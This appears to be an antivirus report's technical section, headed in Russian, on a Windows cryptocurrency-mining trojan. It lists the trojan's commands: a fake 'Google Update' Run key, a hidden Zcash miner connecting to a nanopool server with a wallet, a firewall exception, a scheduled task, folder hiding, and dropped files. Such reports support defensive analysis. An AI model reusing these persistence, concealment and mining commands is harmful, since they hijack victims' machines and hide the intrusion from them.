Техническая информация
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'Google Update' = 'C:\jaax\run.exe'
- 'C:\jaax\nircmd.exe' exec hide servisec.exe --server zec-eu1.nanopool.org --port 6666 --user t1YxKpPYam5tT3yGzMXzQqxKqfzvtqF4G4q.nvida --pass x --pec
- '<SYSTEM32>\netsh.exe' advfirewall firewall add rule name="WePrint" dir=in action=allow profile=any description="WePrint Firewall Exception" program="C:\jaax\servisec.exe"
- '<SYSTEM32>\schtasks.exe' /create /sc minute /mo 30 /tn GoogleUpdate /tr C:\jaax\run.exe
- '<SYSTEM32>\attrib.exe' +s +a +h c:\jaax\*
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\tmp1.tmp.bat" "
- '<SYSTEM32>\attrib.exe' +s +a +h c:\jaax
- C:\jaax\cudart64_80.dll
- C:\jaax\msvcp120.dll
- %TEMP%\tmp1.tmp.bat
- C:\jaax\cudart32_80.dll
- C:\jaax\run.exe
- C:\jaax\servisec.exe
- C:\jaax\msvcr120.dll
- C:\jaax\nircmd.exe
- C:\jaax\nircmd.exe
- C:\jaax\run.exe
- C:\jaax\servisec.exe
- C:\jaax\msvcr120.dll
- C:\jaax\cudart32_80.dll
- C:\jaax\cudart64_80.dll
- C:\jaax\msvcp120.dll
- %TEMP%\tmp1.tmp.bat